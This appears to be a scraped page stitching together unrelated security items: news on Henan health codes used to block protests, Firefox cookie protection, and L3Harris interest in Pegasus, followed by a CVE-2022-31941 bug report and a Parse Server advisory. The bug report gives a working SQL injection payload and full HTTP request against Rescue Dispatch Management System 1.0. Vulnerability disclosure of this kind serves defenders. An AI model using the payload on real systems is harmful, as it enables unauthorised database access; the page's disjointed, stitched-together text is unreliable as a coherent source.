Ever since Covid-19 started spreading in early 2020, technological systems have been developed to try to control its spread. In China, a mandatory health code system was created to monitor people’s health status—people with a red code are required to self-isolate, those with a green code are allowed to move freely. These health codes are tied to people’s phones. Now, according to multiple reports, people in the Chinese province of Henan claim their plans to protest have been blocked as their health code has been turned red. Several people impacted claim they have not been around anyone positive with Covid-19 and the change is an abuse of power by officials.

Mozilla’s web browser may have been struggling in recent years, but it is still one of the most privacy-friendly browsers. This week the company said Firefox is turning on its Total Cookie Protection feature by default for everyone using the browser. Any cookies saved to your computer will be available only to the website that placed them there, Mozilla explains in a blog post. “Instead of allowing trackers to link up your behavior on multiple sites, they just get to see behavior on individual sites,” the company says, adding it is “Firefox’s strongest privacy protection to date.”

In November 2021, the US sanctioned notorious Israeli spyware firm NSO Group. The company’s Pegasus hacking tool has been used around the world to spy on journalists and activists. This week it emerged that US defense firm L3Harris is interested in purchasing the technology behind Pegasus, as the _Financial Times_ reports. Any purchase of the technology by a US company would potentially put it at odds with the Biden administration, which blacklisted NSO. Talk of the potential deal, which was said to be in early stages, has prompted criticism from the White House. “We are deeply concerned,” a senior official told the _Washington Post_. They said the deal could cause security and counterintelligence issues for the US.

An Alleged Russian Spy Was Busted Trying to Intern at The Hague

Rescue Dispatch Management System v1.0 is vulnerable to SQL Injection via \rdms\admin?page=user\manage_user&id=.

**Rescue Dispatch Management System 1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15296/rescue-dispatch-management-system-phpoop-free-source-code.html

Vulnerability File: \\rdms\\admin?page=user\\manage\_user&id=

Vulnerability location: /cms/rdms/admin/?page=user/manage\_user&id=, id

\[+\] Payload: ip/rdms/admin/?page=user/manage\_user&id=-3%27%20union%20select%201,database(),3,4,5,6,7,8,9,10--+

GET /rdms/admin/?page\=user/manage\_user&id\=\-3%27%20union%20select%201,database(),3,4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=hkbchcmaitn0d8enhm4jtdjk9q
Connection: close

CVE-2022-31941: bug_report/SQL-1.md at main · Gsir97/bug_report

Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 4.10.11 and 5.2.2, the certificate in the Parse Server Apple Game Center auth adapter not validated. As a result, authentication could potentially be bypassed by making a fake certificate accessible via certain Apple domains and providing the URL to that certificate in an authData object. Versions 4.0.11 and 5.2.2 prevent this by introducing a new `rootCertificateUrl` property to the Parse Server Apple Game Center auth adapter which takes the URL to the root certificate of Apple's Game Center authentication certificate. If no value is set, the `rootCertificateUrl` property defaults to the URL of the current root certificate as of May 27, 2022. Keep in mind that the root certificate can change at any time and that it is the developer's responsibility to keep the root certificate URL up-to-date when using the Parse Server Apple Game Center auth adapter. There are no known workarounds for this issue.

Tag

#firefox